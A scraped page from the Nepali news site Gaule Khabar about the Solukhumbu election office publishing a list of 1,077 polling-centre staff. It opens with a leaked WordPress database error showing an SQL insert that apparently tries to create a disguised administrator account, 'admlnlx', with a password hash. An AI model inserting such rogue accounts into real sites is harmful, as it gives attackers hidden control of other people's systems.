WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BoUaVyjWVaRPgoLqv5jEfsaxH5RLQd/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-01 13:24:48', '', 'admlnlx', 'admlnlx')

निर्बाचन कार्यालय सोलुले सार्बजनिक गर्‍यो मतदान केन्द्रमा खटिने कर्मचारीको नाम – Gaule Khabar

निर्बाचन कार्यालय सोलुले सार्बजनिक गर्‍यो मतदान केन्द्रमा खटिने कर्मचारीको नाम

निर्बाचन कार्यालय सोलुले सार्बजनिक गर्‍यो मतदान केन्द्रमा खटिने कर्मचारीको नाम

सोलुखुम्बु । मंसिर ४ गते हुने प्रतिनिधि र प्रदेश सभा सदस्य निर्वाचनमा सोलुखुम्बु जिल्लाबाट खटिने कर्मचारीको नामावली सार्बजनिक गरिएको छ ।

मूख्य निर्वाचन अधिकृत कार्यालय सोलुखुम्बुले बुधबार एक सूचना जारी गर्दै विभिन्न स्थानीय तहमा खटिने कर्मचारीको नामावली सार्बजनिक गरेको हो ।

सहायक निर्वाचन अधिकृत नगेन्द्र कुमार कालाखेतिका अनुसार जिल्लाभरका मतदान केन्द्रहरुमा खटिने मतदान अधिकृत, सहायक मतदान अधिकृत, सहायक कर्मचारी र सहयोगी कर्मचारीहरुको विवरण तयार गरी एक हजार ७७ जनाको नामावली प्रकाशन गरिएको हो।

मुख्य निर्वाचन अधिकृतको कार्यालय सोलुखुम्बुका अनुसार कार्तिक २१ र २२ गते मतदान अधिकृत र सहायक अधिकृतले नियुक्ति पत्र लिइसक्नु पर्ने साथै कार्तिक २२ र २३ गतेभित्र मुख्य निर्वाचन अधिकृतको कार्यालयमा सहायक कर्मचारीहरुले नियुक्ति लिइसक्नुपर्ने जनाइएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका